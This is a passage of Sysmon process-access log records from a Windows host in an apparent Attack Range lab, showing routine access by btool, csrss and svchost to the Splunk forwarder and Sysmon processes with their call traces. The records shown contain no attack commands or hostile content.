Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-00109FD90300}","SourceProcessId":"4056","SourceThreadId":"4052","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A8DA0300}","TargetProcessId":"3464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A8DA0300}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A8DA0300}","TargetProcessId":"3464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
